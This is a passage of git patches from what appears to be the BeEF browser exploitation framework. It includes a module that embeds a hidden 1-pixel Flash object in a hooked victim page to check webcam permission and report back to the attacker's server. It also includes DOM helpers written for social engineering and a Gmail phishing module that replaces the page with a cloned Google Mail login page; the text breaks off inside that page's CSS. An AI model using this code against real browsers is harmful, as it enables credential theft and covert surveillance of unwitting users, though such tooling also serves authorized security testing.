+        beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=The user has  allowed  BeEF to access the camera :D");
+    }
+
+    naPermissions = function() {
+        beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Camera not supported / available :/&unmount=true");
+    }
+
+    //After the swfobject loads the SWF file, this callback sends a status back to BeEF
+
+    var swfobjectCallback = function(e) {
+        if(e.success){
+            beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Swfobject successfully added flash object to the victim page");
+        } else {
+            beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Swfobject was not able to add the swf file to the page. This could mean there was no flash plugin installed.");
+        }
+    }
+
+
+    //This is the DIV for the flash object
     
     var body_flash_container = '<div id="main" style="position:absolute;top:150px;left:80px;width:1px;height:1px;opacity:0.8;"></div>';
+    $j('body').append(body_flash_container);
+
+    // Lets execute swfobject.js
+    // If it works, we then run it to embed the swf file into the above div
+    $j.getScript(beef.net.httpproto+'://'+beef.net.host+':'+beef.net.port+'/swfobject.js',function(data,txtStatus,jqxhr) {
+        var flashvars = {};
+        var parameters = {};
+        parameters.scale = "noscale";
+        parameters.wmode = "opaque";
+        parameters.allowFullScreen = "true";
+        parameters.allowScriptAccess = "always";
+        var attributes = {};
+        swfobject.embedSWF(beef.net.httpproto+'://'+beef.net.host+':'+beef.net.port+'/cameraCheck.swf', "main", "1", "1", "9", "expressInstall.swf", flashvars, parameters, attributes, swfobjectCallback);
+    });
         
     //A library that helps include the swf file
-    var swfobject_script = '<script type="text/javascript" src="http://'+beef.net.host+':'+beef.net.port+'/swfobject.js"></script>'
+    //var swfobject_script = '<script type="text/javascript" src="http://'+beef.net.host+':'+beef.net.port+'/swfobject.js"></script>'
     
     //This is the javascript that actually calls the swfobject library to include the swf file 
-    var include_script = '<script>var flashvars = {}; var parameters = {}; parameters.scale = "noscale"; parameters.wmode = "opaque"; parameters.allowFullScreen = "true"; parameters.allowScriptAccess = "always"; var attributes = {}; swfobject.embedSWF("http://'+beef.net.host+':'+beef.net.port+'/cameraCheck.swf", "main", "1", "1", "9", "expressInstall.swf", flashvars, parameters, attributes, swfobjectCallback);</script>';
+    //var include_script = '<script>var flashvars = {}; var parameters = {}; parameters.scale = "noscale"; parameters.wmode = "opaque"; parameters.allowFullScreen = "true"; parameters.allowScriptAccess = "always"; var attributes = {}; swfobject.embedSWF("http://'+beef.net.host+':'+beef.net.port+'/cameraCheck.swf", "main", "1", "1", "9", "expressInstall.swf", flashvars, parameters, attributes, swfobjectCallback);</script>';
     
 
     //Add flash content
-    $j('body').append(js_functions, swfobject_script, body_flash_container, include_script);
+    //$j('body').append(js_functions, swfobject_script, body_flash_container, include_script);
     
 });
 
diff --git a/modules/browser/webcam_permision_check/config.yaml b/modules/browser/webcam_permision_check/config.yaml
index 78558df0d..c63080343 100644
--- a/modules/browser/webcam_permision_check/config.yaml
+++ b/modules/browser/webcam_permision_check/config.yaml
@@ -5,7 +5,7 @@
 #
 beef:
     module:
-        wb:
+        webcam_permission_check:
             enable: true
             category: "Browser"
             name: "Webcam Permission Check"
diff --git a/modules/browser/webcam_permision_check/module.rb b/modules/browser/webcam_permision_check/module.rb
index 2cf19a11d..27a3899cf 100644
--- a/modules/browser/webcam_permision_check/module.rb
+++ b/modules/browser/webcam_permision_check/module.rb
@@ -4,14 +4,15 @@
 # See the file 'doc/COPYING' for copying permission
 #
 
-class Wb < BeEF::Core::Command
+class Webcam_permission_check < BeEF::Core::Command
   def pre_send
-      BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/browser/wb/cameraCheck.swf', '/cameraCheck', 'swf')
-      BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/browser/wb/swfobject.js', '/swfobject', 'js')
+      BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/browser/webcam_permission_check/cameraCheck.swf', '/cameraCheck', 'swf')
+      BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/browser/webcam_permission_check/swfobject.js', '/swfobject', 'js')
   end
   
   def post_execute 
-    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/cameraCheck.swf')
+
+  	BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/cameraCheck.swf')
 	BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/swfobject.js')
   end
 

From 79572a61f0c17a9fc294bb9992774ca99ca27c9e Mon Sep 17 00:00:00 2001
From: Christian Frichot <xntrik@gmail.com>
Date: Sat, 6 Apr 2013 14:35:21 +0800
Subject: [PATCH 257/397] Renamed webcam_permission_check module

---
 .../cameraCheck.as                                  |   0
 .../cameraCheck.swf                                 | Bin
 .../command.js                                      |   0
 .../config.yaml                                     |   0
 .../module.rb                                       |   0
 .../swfobject.js                                    |   0
 6 files changed, 0 insertions(+), 0 deletions(-)
 rename modules/browser/{webcam_permision_check => webcam_permission_check}/cameraCheck.as (100%)
 rename modules/browser/{webcam_permision_check => webcam_permission_check}/cameraCheck.swf (100%)
 rename modules/browser/{webcam_permision_check => webcam_permission_check}/command.js (100%)
 rename modules/browser/{webcam_permision_check => webcam_permission_check}/config.yaml (100%)
 rename modules/browser/{webcam_permision_check => webcam_permission_check}/module.rb (100%)
 rename modules/browser/{webcam_permision_check => webcam_permission_check}/swfobject.js (100%)

diff --git a/modules/browser/webcam_permision_check/cameraCheck.as b/modules/browser/webcam_permission_check/cameraCheck.as
similarity index 100%
rename from modules/browser/webcam_permision_check/cameraCheck.as
rename to modules/browser/webcam_permission_check/cameraCheck.as
diff --git a/modules/browser/webcam_permision_check/cameraCheck.swf b/modules/browser/webcam_permission_check/cameraCheck.swf
similarity index 100%
rename from modules/browser/webcam_permision_check/cameraCheck.swf
rename to modules/browser/webcam_permission_check/cameraCheck.swf
diff --git a/modules/browser/webcam_permision_check/command.js b/modules/browser/webcam_permission_check/command.js
similarity index 100%
rename from modules/browser/webcam_permision_check/command.js
rename to modules/browser/webcam_permission_check/command.js
diff --git a/modules/browser/webcam_permision_check/config.yaml b/modules/browser/webcam_permission_check/config.yaml
similarity index 100%
rename from modules/browser/webcam_permision_check/config.yaml
rename to modules/browser/webcam_permission_check/config.yaml
diff --git a/modules/browser/webcam_permision_check/module.rb b/modules/browser/webcam_permission_check/module.rb
similarity index 100%
rename from modules/browser/webcam_permision_check/module.rb
rename to modules/browser/webcam_permission_check/module.rb
diff --git a/modules/browser/webcam_permision_check/swfobject.js b/modules/browser/webcam_permission_check/swfobject.js
similarity index 100%
rename from modules/browser/webcam_permision_check/swfobject.js
rename to modules/browser/webcam_permission_check/swfobject.js

From af67c6a8d94764fd803f6b8b875d82b39022a3fd Mon Sep 17 00:00:00 2001
From: Christian Frichot <xntrik@gmail.com>
Date: Sat, 6 Apr 2013 15:52:32 +0800
Subject: [PATCH 258/397] Few enhancements to dom.js. See #870 #871 #872

---
 core/main/client/dom.js | 80 +++++++++++++++++++++++++++++++++++++++--
 1 file changed, 78 insertions(+), 2 deletions(-)

diff --git a/core/main/client/dom.js b/core/main/client/dom.js
index 2026f7117..913aeae73 100644
--- a/core/main/client/dom.js
+++ b/core/main/client/dom.js
@@ -119,8 +119,15 @@ beef.dom = {
 			var form_action = params['src'];
 			params['src'] = '';
 		}
-		if (type == 'hidden') { css = $j.extend(true, {'border':'none', 'width':'1px', 'height':'1px', 'display':'none', 'visibility':'hidden'}, styles); }
-		if (type == 'fullscreen') { css = $j.extend(true, {'border':'none', 'background-color':'white', 'width':'100%', 'height':'100%', 'position':'absolute', 'top':'0px', 'left':'0px', 'z-index':beef.dom.getHighestZindex()+1}, styles); $j('body').css({'padding':'0px', 'margin':'0px'}); }
+		if (type == 'hidden') {
+			css = $j.extend(true, {'border':'none', 'width':'1px', 'height':'1px', 'display':'none', 'visibility':'hidden'}, styles);
+		} else if (type == 'fullscreen') {
+			css = $j.extend(true, {'border':'none', 'background-color':'white', 'width':'100%', 'height':'100%', 'position':'absolute', 'top':'0px', 'left':'0px', 'z-index':beef.dom.getHighestZindex()+1}, styles);
+			$j('body').css({'padding':'0px', 'margin':'0px'});
+		} else {
+			css = styles;
+			$j('body').css({'padding':'0px', 'margin':'0px'});
+		}
 		var iframe = $j('<iframe />').attr(params).css(css).load(onload).prependTo('body');
 		
 		if (form_submit && form_action)
@@ -151,6 +158,75 @@ beef.dom = {
             }
         });
     },
+
+    /**
+     * Load a full screen div that is black, or, transparent
+     * @param: {Boolean} vis: whether or not you want the screen dimmer enabled or not
+     * @param: {Hash} options: a collection of options to customise how the div is configured, as follows:
+     *         opacity:0-100         // Lower number = less grayout higher = more of a blackout
+     *           // By default this is 70 
+     *         zindex: #             // HTML elements with a higher zindex appear on top of the gray out
+     *           // By default this will use beef.dom.getHighestZindex to always go to the top
+     *         bgcolor: (#xxxxxx)    // Standard RGB Hex color code
+     *           // By default this is #000000
+     */
+	grayOut: function(vis, options) {
+	  // in any order.  Pass only the properties you need to set.
+	  var options = options || {};
+	  var zindex = options.zindex || beef.dom.getHighestZindex()+1;
+	  var opacity = options.opacity || 70;
+	  var opaque = (opacity / 100);
+	  var bgcolor = options.bgcolor || '#000000';
+	  var dark=document.getElementById('darkenScreenObject');
+	  if (!dark) {
+	    // The dark layer doesn't exist, it's never been created.  So we'll
+	    // create it here and apply some basic styles.
+	    // If you are getting errors in IE see: http://support.microsoft.com/default.aspx/kb/927917
+	    var tbody = document.getElementsByTagName("body")[0];
+	    var tnode = document.createElement('div');           // Create the layer.
+	        tnode.style.position='absolute';                 // Position absolutely
+	        tnode.style.top='0px';                           // In the top
+	        tnode.style.left='0px';                          // Left corner of the page
+	        tnode.style.overflow='hidden';                   // Try to avoid making scroll bars            
+	        tnode.style.display='none';                      // Start out Hidden
+	        tnode.id='darkenScreenObject';                   // Name it so we can find it later
+	    tbody.appendChild(tnode);                            // Add it to the web page
+	    dark=document.getElementById('darkenScreenObject');  // Get the object.
+	  }
+	  if (vis) {
+	    // Calculate the page width and height 
+	    if( document.body && ( document.body.scrollWidth || document.body.scrollHeight ) ) {
+	        var pageWidth = document.body.scrollWidth+'px';
+	        var pageHeight = document.body.scrollHeight+'px';
+	    } else if( document.body.offsetWidth ) {
+	      var pageWidth = document.body.offsetWidth+'px';
+	      var pageHeight = document.body.offsetHeight+'px';
+	    } else {
+	       var pageWidth='100%';
+	       var pageHeight='100%';
+	    }
+	    //set the shader to cover the entire page and make it visible.
+	    dark.style.opacity=opaque;
+	    dark.style.MozOpacity=opaque;
+	    dark.style.filter='alpha(opacity='+opacity+')';
+	    dark.style.zIndex=zindex;
+	    dark.style.backgroundColor=bgcolor;
+	    dark.style.width= pageWidth;
+	    dark.style.height= pageHeight;
+	    dark.style.display='block';
+	  } else {
+	     dark.style.display='none';
+	  }
+	},
+
+	/**
+	 * Remove all external and internal stylesheets from the current page - sometimes prior to socially engineering,
+	 *  or, re-writing a document this is useful.
+	 */
+	removeStylesheets: function() {
+		$j('link[rel=stylesheet]').remove();
+		$j('style').remove();
+	},
 	
 	/**
      * Create a form element with the specified parameters, appending it to the DOM if append == true

From 2ef1b5bab8604539301118600c60e8ce823f24e9 Mon Sep 17 00:00:00 2001
From: Christian Frichot <xntrik@gmail.com>
Date: Sat, 6 Apr 2013 15:54:55 +0800
Subject: [PATCH 259/397] Updates gmail phishing command module. Fixes #873

---
 modules/social_engineering/gmail_phishing/command.js | 4 +++-
 1 file changed, 3 insertions(+), 1 deletion(-)

diff --git a/modules/social_engineering/gmail_phishing/command.js b/modules/social_engineering/gmail_phishing/command.js
index 156bd65a3..c43df0514 100644
--- a/modules/social_engineering/gmail_phishing/command.js
+++ b/modules/social_engineering/gmail_phishing/command.js
@@ -38,5 +38,7 @@ function redirect(){
 }
 
 function displayPhishingSite(){
-    document.body.innerHTML = "<!DOCTYPE html> <html lang='en'>   <head>   <meta charset='utf-8'>   <title>Google Mail: Email from Google</title>   <meta name='description' content='7+ GB of storage, less spam, and mobile access.  is email that&#39;s intuitive, efficient, and useful. And maybe even fun.'>   <link rel='icon' type='image/ico' href='//mail.google.com/favicon.ico'> <style type='text/css'>   html, body, div, h1, h2, h3, h4, h5, h6, p, img, dl,   dt, dd, ol, ul, li, table, tr, td, form, object, embed,   article, aside, canvas, command, details, fieldset,   figcaption, figure, footer, group, header, hgroup, legend,   mark, menu, meter, nav, output, progress, section, summary,   time, audio, video {   margin: 0;   padding: 0;   border: 0;   }   article, aside, details, figcaption, figure, footer,   header, hgroup, menu, nav, section {   display: block;   }   html {   font: 81.25% arial, helvetica, sans-serif;   background: #fff;   color: #333;   line-height: 1;   direction: ltr;   }   a {   color: #15c;   text-decoration: none;   }   a:active {   color: #d14836;   }   a:hover {   text-decoration: underline;   }   h1, h2, h3, h4, h5, h6 {   color: #222;   font-size: 1.54em;   font-weight: normal;   line-height: 24px;   margin: 0 0 .46em;   }   p {   line-height: 17px;   margin: 0 0 1em;   }   ol, ul {   list-style: none;   line-height: 17px;   margin: 0 0 1em;   }   li {   margin: 0 0 .5em;   }   table {   border-collapse: collapse;   border-spacing: 0;   }   strong {   color: #222;   } </style> <style type='text/css'>   html, body {   position: absolute;   height: 100%;   min-width: 100%;   }   .wrapper {   position: relative;   min-height: 100%;   }   .wrapper + style + iframe {   display: none;   }   .content {   padding: 0 44px;   }   .google-header-bar {   height: 71px;   background: #f1f1f1;   border-bottom: 1px solid #e5e5e5;   overflow: hidden;   }   .header .logo {   margin: 17px 0 0;   float: left;   }   .header .signin,   .header .signup {   margin: 28px 0 0;   float: right;   font-weight: bold;   }   .header .signin-button,   .header .signup-button {   margin: 22px 0 0;   float: right;   }   .header .signin-button a {   font-size: 13px;   font-weight: normal;   }   .header .signup-button a {   position: relative;   top: -1px;   margin: 0 0 0 1em;   }   .main {   margin: 0 auto;   width: 650px;   padding-top: 23px;   padding-bottom: 100px;   }   .main h1:first-child {   margin: 0 0 .92em;   }   .google-footer-bar {   position: absolute;   bottom: 0;   height: 35px;   width: 100%;   border-top: 1px solid #ebebeb;   overflow: hidden;   }   .footer {   padding-top: 9px;   font-size: .85em;   white-space: nowrap;   line-height: 0;   }   .footer ul {   color: #999;   float: left;   max-width: 80%;   }   .footer ul li {   display: inline;   padding: 0 1.5em 0 0;   }   .footer a {   color: #333;   }   .footer form {   text-align: right;   }   .footer form .lang-chooser {   max-width: 20%;   }   .redtext {   color: #dd4b39;   }   .greytext {   color: #555;   }   .secondary {   font-size: 11px;   color: #666;   }   .source {   color: #093;   }   .hidden {   display: none;   }   .announce-bar {   position: absolute;   bottom: 35px;   height: 33px;   z-index: 2;   width: 100%;   background: #f9edbe;   border-top: 1px solid #efe1ac;   border-bottom: 1px solid #efe1ac;   overflow: hidden;   }   .announce-bar .message {   font-size: .85em;   line-height: 33px;   margin: 0;   }   .announce-bar .message .separated {   margin-left: 1.5em;   }   .announce-bar-ac {   background: #eee;   border-top: 1px solid #e5e5e5;   border-bottom: 1px solid #e5e5e5;   }   .clearfix:after {   visibility: hidden;   display: block;   font-size: 0;   content: '.';   clear: both;   height: 0;   }   * html .clearfix {   zoom: 1;   }   *:first-child+html .clearfix {   zoom: 1;   } </style> <style type='text/css'>   button, input, select, textarea {   font-family: inherit;   font-size: inherit;   }   button::-moz-focus-inner,   input::-moz-focus-inner {   border: 0;   }   input[type=email],   input[type=number],   input[type=password],   input[type=tel],   input[type=text],   input[type=url] {   display: inline-block;   height: 29px;   margin: 0;   padding: 0 8px;   background: #fff;   border: 1px solid #d9d9d9;   border-top: 1px solid #c0c0c0;   -webkit-box-sizing: border-box;   -moz-box-sizing: border-box;   box-sizing: border-box;   -webkit-border-radius: 1px;   -moz-border-radius: 1px;   border-radius: 1px;   }   input[type=email]:hover,   input[type=number]:hover,   input[type=password]:hover,   input[type=tel]:hover,   input[type=text]:hover,   input[type=url]:hover {   border: 1px solid #b9b9b9;   border-top: 1px solid #a0a0a0;   -webkit-box-shadow: inset 0 1px 2px rgba(0,0,0,0.1);   -moz-box-shadow: inset 0 1px 2px rgba(0,0,0,0.1);   box-shadow: inset 0 1px 2px rgba(0,0,0,0.1);   }   input[type=email]:focus,   input[type=number]:focus,   input[type=password]:focus,   input[type=tel]:focus,   input[type=text]:focus,   input[type=url]:focus {   outline: none;   border: 1px solid #4d90fe;   -webkit-box-shadow: inset 0 1px 2px rgba(0,0,0,0.3);   -moz-box-shadow: inset 0 1px 2px rgba(0,0,0,0.3);   box-shadow: inset 0 1px 2px rgba(0,0,0,0.3);   }   input[type=email][disabled=disabled],   input[type=number][disabled=disabled],   input[type=password][disabled=disabled],   input[type=tel][disabled=disabled],   input[type=text][disabled=disabled],   input[type=url][disabled=disabled] {   border: 1px solid #e5e5e5;   background: #f1f1f1;   }   input[type=email][disabled=disabled]:hover,   input[type=number][disabled=disabled]:hover,   input[type=password][disabled=disabled]:hover,   input[type=tel][disabled=disabled]:hover,   input[type=text][disabled=disabled]:hover,   input[type=url][disabled=disabled]:hover {   -webkit-box-shadow: none;   -moz-box-shadow: none;   box-shadow: none;   }   input[type=email][readonly=readonly],   input[type=number][readonly=readonly],   input[type=password][readonly=readonly],   input[type=text][readonly=readonly],   input[type=url][readonly=readonly] {   border: 1px solid #d9d9d9;   }   input[type=email][readonly=readonly]:hover,   input[type=number][readonly=readonly]:hover,   input[type=password][readonly=readonly]:hover,   input[type=text][readonly=readonly]:hover,   input[type=url][readonly=readonly]:hover,   input[type=email][readonly=readonly]:focus,   input[type=number][readonly=readonly]:focus,   input[type=password][readonly=readonly]:focus,   input[type=text][readonly=readonly]:focus,   input[type=url][readonly=readonly]:focus {   -webkit-box-shadow: none;   -moz-box-shadow: none;   box-shadow: none;   }   input[type=checkbox].form-error,   input[type=email].form-error,   input[type=number].form-error,   input[type=password].form-error,   input[type=text].form-error,   input[type=url].form-error {   border: 1px solid #dd4b39;   }   input[type=checkbox],   input[type=radio] {   -webkit-appearance: none;   appearance: none;   width: 13px;   height: 13px;   margin: 0;   cursor: pointer;   vertical-align: bottom;   background: #fff;   border: 1px solid #dcdcdc;   -webkit-border-radius: 1px;   -moz-border-radius: 1px;   border-radius: 1px;   -webkit-box-sizing: border-box;   -moz-box-sizing: border-box;   box-sizing: border-box;   position: relative;   }   input[type=checkbox]:active,   input[type=radio]:active {   border-color: #c6c6c6;   background: #ebebeb;   }   input[type=checkbox]:hover {   border-color: #c6c6c6;   -webkit-box-shadow: inset 0 1px 1px rgba(0,0,0,0.1);   -moz-box-shadow: inset 0 1px 1px rgba(0,0,0,0.1);   box-shadow: inset 0 1px 1px rgba(0,0,0,0.1);   }   input[type=radio] {   -webkit-border-radius: 1em;   -moz-border-radius: 1em;   border-radius: 1em;   width: 15px;   height: 15px;   }   input[type=checkbox]:checked,   input[type=radio]:checked {   background: #fff;   }   input[type=radio]:checked::after {   content: '';   display: block;   position: relative;   top: 3px;   left: 3px;   width: 7px;   height: 7px;   background: #666;   -webkit-border-radius: 1em;   -moz-border-radius: 1em;   border-radius: 1em;   }   input[type=checkbox]:checked::after {   content: url(//ssl.gstatic.com/ui/v1/menu/checkmark.png);   display: block;   position: absolute;   top: -6px;   left: -5px;   }   input[type=checkbox]:focus {   outline: none;   border-color:#4d90fe;   }   .g-button {   display: inline-block;   min-width: 46px;   text-align: center;   color: #444;   font-size: 11px;   font-weight: bold;   height: 27px;   padding: 0 8px;   line-height: 27px;   -webkit-border-radius: 2px;   -moz-border-radius: 2px;   border-radius: 2px;   -webkit-transition: all 0.218s;   -moz-transition: all 0.218s;   -ms-transition: all 0.218s;   -o-transition: all 0.218s;   transition: all 0.218s;   border: 1px solid #dcdcdc;   background-color: #f5f5f5;   background-image: -webkit-gradient(linear,left top,left bottom,from(#f5f5f5),to(#f1f1f1));   background-image: -webkit-linear-gradient(top,#f5f5f5,#f1f1f1);   background-image: -moz-linear-gradient(top,#f5f5f5,#f1f1f1);   background-image: -ms-linear-gradient(top,#f5f5f5,#f1f1f1);   background-image: -o-linear-gradient(top,#f5f5f5,#f1f1f1);   background-image: linear-gradient(top,#f5f5f5,#f1f1f1);   -webkit-user-select: none;   -moz-user-select: none;   user-select: none;   cursor: default;   }   *+html .g-button {   min-width: 70px;   }   button.g-button,   input[type=submit].g-button {   height: 29px;   line-height: 29px;   vertical-align: bottom;   margin: 0;   }   *+html button.g-button,   *+html input[type=submit].g-button {   overflow: visible;   }   .g-button:hover {   border: 1px solid #c6c6c6;   color: #333;   text-decoration: none;   -webkit-transition: all 0.0s;   -moz-transition: all 0.0s;   -ms-transition: all 0.0s;   -o-transition: all 0.0s;   transition: all 0.0s;   background-color: #f8f8f8;   background-image: -webkit-gradient(linear,left top,left bottom,from(#f8f8f8),to(#f1f1f1));   background-image: -webkit-linear-gradient(top,#f8f8f8,#f1f1f1);   background-image: -moz-linear-gradient(top,#f8f8f8,#f1f1f1);   background-image: -ms-linear-gradient(top,#f8f8f8,#f1f1f1);   background-image: -o-linear-gradient(top,#f8f8f8,#f1f1f1);   background-image: linear-gradient(top,#f8f8f8,#f1f1f1);   -webkit-box-shadow: 0 1px 1px rgba(0,0,0,0.1);   -moz-box-shadow: 0 1px 1px rgba(0,0,0,0.1);   box-shadow: 0 1px 1px rgba(0,0,0,0.1);   }   .g-button:active {   background-color: #f6f6f6;   background-image: -webkit-gradient(linear,left top,left bottom,from(#f6f6f6),to(#f1f1f1));   background-image: -webkit-linear-gradient(top,#f6f6f6,#f1f1f1);   background-image: -moz-linear-gradient(top,#f6f6f6,#f1f1f1);   background-image: -ms-linear-gradient(top,#f6f6f6,#f1f1f1);   background-image: -o-linear-gradient(top,#f6f6f6,#f1f1f1);   background-image: linear-gradient(top,#f6f6f6,#f1f1f1);   -webkit-box-shadow: inset 0 1px 2px rgba(0,0,0,0.1);   -moz-box-shadow: inset 0 1px 2px rgba(0,0,0,0.1);   box-shadow: inset 0 1px 2px rgba(0,0,0,0.1);   }   .g-button:visited {   color: #666;   }   .g-button-submit {   border: 1px solid #3079ed;   color: #fff;   text-shadow: 0 1px rgba(0,0,0,0.1);   background-color: #4d90fe;   background-image: -webkit-gradient(linear,left top,left bottom,from(#4d90fe),to(#4787ed));   background-image: -webkit-linear-gradient(top,#4d90fe,#4787ed);   background-image: -moz-linear-gradient(top,#4d90fe,#4787ed);   background-image: -ms-linear-gradient(top,#4d90fe,#4787ed);   background-image: -o-linear-gradient(top,#4d90fe,#4787ed);   background-image: linear-gradient(top,#4d90fe,#4787ed);   }   .g-button-submit:hover {   border: 1px solid #2f5bb7;   color: #fff;   text-shadow: 0 1px rgba(0,0,0,0.3);   background-color: #357ae8;   background-image: -webkit-gradient(linear,left top,left bottom,from(#4d90fe),to(#357ae8));   background-image: -webkit-linear-gradient(top,#4d90fe,#357ae8);   background-image: -moz-linear-gradient(top,#4d90fe,#357ae8);   background-image: -ms-linear-gradient(top,#4d90fe,#357ae8);   background-image: -o-linear-gradient(top,#4d90fe,#357ae8);   background-image: linear-gradient(top,#4d90fe,#357ae8);   }   .g-button-submit:active {   -webkit-box-shadow: inset 0 1px 2px rgba(0,0,0,0.3);   -moz-box-shadow: inset 0 1px 2px rgba(0,0,0,0.3);   box-shadow: inset 0 1px 2px rgba(0,0,0,0.3);   }   .g-button-share {   border: 1px solid #29691d;   color: #fff;   text-shadow: 0 1px rgba(0,0,0,0.1);   background-color: #3d9400;   background-image: -webkit-gradient(linear,left top,left bottom,from(#3d9400),to(#398a00));   background-image: -webkit-linear-gradient(top,#3d9400,#398a00);   background-image: -moz-linear-gradient(top,#3d9400,#398a00);   background-image: -ms-linear-gradient(top,#3d9400,#398a00);   background-image: -o-linear-gradient(top,#3d9400,#398a00);   background-image: linear-gradient(top,#3d9400,#398a00);   }   .g-button-share:hover {   border: 1px solid #2d6200;   color: #fff;   text-shadow: 0 1px rgba(0,0,0,0.3);   background-color: #368200;   background-image: -webkit-gradient(linear,left top,left bottom,from(#3d9400),to(#368200));   background-image: -webkit-linear-gradient(top,#3d9400,#368200);   background-image: -moz-linear-gradient(top,#3d9400,#368200);   background-image: -ms-linear-gradient(top,#3d9400,#368200);   background-image: -o-linear-gradient(top,#3d9400,#368200);   background-image: linear-gradient(top,#3d9400,#368200);   }   .g-button-share:active {   -webkit-box-shadow: inset 0 1px 2px rgba(0,0,0,0.3);   -moz-box-shadow: inset 0 1px 2px rgba(0,0,0,0.3);   box-shadow: inset 0 1px 2px rgba(0,0,0,0.3);   }   .g-button-red {   border: 1px solid transparent;   color: #fff;   text-shadow: 0 1px rgba(0,0,0,0.1);   text-transform: uppercase;   background-color: #d14836;   background-image: -webkit-gradient(linear,left top,left bottom,from(#dd4b39),to(#d14836));   background-image: -webkit-linear-gradient(top,#dd4b39,#d14836);   background-image: -moz-linear-gradient(top,#dd4b39,#d14836);   background-image: -ms-linear-gradient(top,#dd4b39,#d14836);   background-image: -o-linear-gradient(top,#dd4b39,#d14836);   background-image: linear-gradient(top,#dd4b39,#d14836);   }   .g-button-red:hover {   border: 1px solid #b0281a;   color: #fff;   text-shadow: 0 1px rgba(0,0,0,0.3);   background-color: #c53727;   background-image: -webkit-gradient(linear,left top,left bottom,from(#dd4b39),to(#c53727));   background-image: -webkit-linear-gradient(top,#dd4b39,#c53727);   background-image: -moz-linear-gradient(top,#dd4b39,#c53727);   background-image: -ms-linear-gradient(top,#dd4b39,#c53727);   background-image: -o-linear-gradient(top,#dd4b39,#c53727);   background-image: linear-gradient(top,#dd4b39,#c53727);   -webkit-box-shadow: 0 1px 1px rgba(0,0,0,0.2);   -moz-box-shadow: 0 1px 1px rgba(0,0,0,0.2);   -ms-box-shadow: 0 1px 1px rgba(0,0,0,0.2);   -o-box-shadow: 0 1px 1px rgba(0,0,0,0.2);   box-shadow: 0 1px 1px rgba(0,0,0,0.2);   }   .g-button-red:active {   border: 1px solid #992a1b;   background-color: #b0281a;   background-image: -webkit-gradient(linear,left top,left bottom,from(#dd4b39),to(#b0281a));   background-image: -webkit-linear-gradient(top,#dd4b39,#b0281a);   background-image: -moz-linear-gradient(top,#dd4b39,#b0281a);   background-image: -ms-linear-gradient(top,#dd4b39,#b0281a);   background-image: -o-linear-gradient(top,#dd4b39,#b0281a);   background-image: linear-gradient(top,#dd4b39,#b0281a);   -webkit-box-shadow: inset 0 1px 2px rgba(0,0,0,0.3);   -moz-box-shadow: inset 0 1px 2px rgba(0,0,0,0.3);   box-shadow: inset 0 1px 2px rgba(0,0,0,0.3);   }   .g-button-white {   border: 1px solid #dcdcdc;   color: #666;   background: #fff;   }   .g-button-white:hover {   border: 1px solid #c6c6c6;   color: #333;   background: #fff;   -webkit-box-shadow: 0 1px 1px rgba(0,0,0,0.1);   -moz-box-shadow: 0 1px 1px rgba(0,0,0,0.1);   box-shadow: 0 1px 1px rgba(0,0,0,0.1);   }   .g-button-white:active {   background: #fff;   -webkit-box-shadow: inset 0 1px 2px rgba(0,0,0,0.1);   -moz-box-shadow: inset 0 1px 2px rgba(0,0,0,0.1);   box-shadow: inset 0 1px 2px rgba(0,0,0,0.1);   }   .g-button-red:visited,   .g-button-share:visited,   .g-button-submit:visited {   color: #fff;   }   .g-button-submit:focus,   .g-button-share:focus,   .g-button-red:focus {   -webkit-box-shadow: inset 0 0 0 1px #fff;   -moz-box-shadow: inset 0 0 0 1px #fff;   box-shadow: inset 0 0 0 1px #fff;   }   .g-button-share:focus {   border-color: #29691d;   }   .g-button-red:focus {   border-color: #d14836;   }   .g-button-submit:focus:hover,   .g-button-share:focus:hover,   .g-button-red:focus:hover {   -webkit-box-shadow: inset 0 0 0 1px #fff, 0 1px 1px rgba(0,0,0,0.1);   -moz-box-shadow: inset 0 0 0 1px #fff, 0 1px 1px rgba(0,0,0,0.1);   box-shadow: inset 0 0 0 1px #fff, 0 1px 1px rgba(0,0,0,0.1);   }   .g-button.selected {   background-color: #eee;   background-image: -webkit-gradient(linear,left top,left bottom,from(#eee),to(#e0e0e0));   background-image: -webkit-linear-gradient(top,#eee,#e0e0e0);   background-image: -moz-linear-gradient(top,#eee,#e0e0e0);   background-image: -ms-linear-gradient(top,#eee,#e0e0e0);   background-image: -o-linear-gradient(top,#eee,#e0e0e0);   background-image: linear-gradient(top,#eee,#e0e0e0);   -webkit-box-shadow: inset 0 1px 2px rgba(0,0,0,0.1);   -moz-box-shadow: inset 0 1px 2px rgba(0,0,0,0.1);   box-shadow: inset 0 1px 2px rgba(0,0,0,0.1);   border: 1px solid #ccc;   color: #333;   }   .g-button img {   display: inline-block;   margin: -3px 0 0;   opacity: .55;   filter: alpha(opacity=55);   vertical-align: middle;   pointer-events: none;   }   *+html .g-button img {   margin: 4px 0 0;   }   .g-button:hover img {   opacity: .72;   filter: alpha(opacity=72);   }   .g-button:active img {   opacity: 1;   filter: alpha(opacity=100);   }   .g-button.disabled img {   opacity: .5;   filter: alpha(opacity=50);   }   .g-button.disabled,   .g-button.disabled:hover,   .g-button.disabled:active,   .g-button-submit.disabled,   .g-button-submit.disabled:hover,   .g-button-submit.disabled:active,   .g-button-share.disabled,   .g-button-share.disabled:hover,   .g-button-share.disabled:active,   .g-button-red.disabled,   .g-button-red.disabled:hover,   .g-button-red.disabled:active,   input[type=submit][disabled=disabled].g-button {   background-color: none;   opacity: .5;   filter: alpha(opacity=50);   cursor: default;   pointer-events: none;   }   .goog-menu {   -webkit-box-shadow: 0 2px 4px rgba(0,0,0,0.2);   -moz-box-shadow: 0 2px 4px rgba(0,0,0,0.2);   box-shadow: 0 2px 4px rgba(0,0,0,0.2);   -webkit-transition: opacity 0.218s;   -moz-transition: opacity 0.218s;   -ms-transition: opacity 0.218s;   -o-transition: opacity 0.218s;   transition: opacity 0.218s;   background: #fff;   border: 1px solid #ccc;   border: 1px solid rgba(0,0,0,.2);   cursor: default;   font-size: 13px;   margin: 0;   outline: none;   padding: 0 0 6px;   position: absolute;   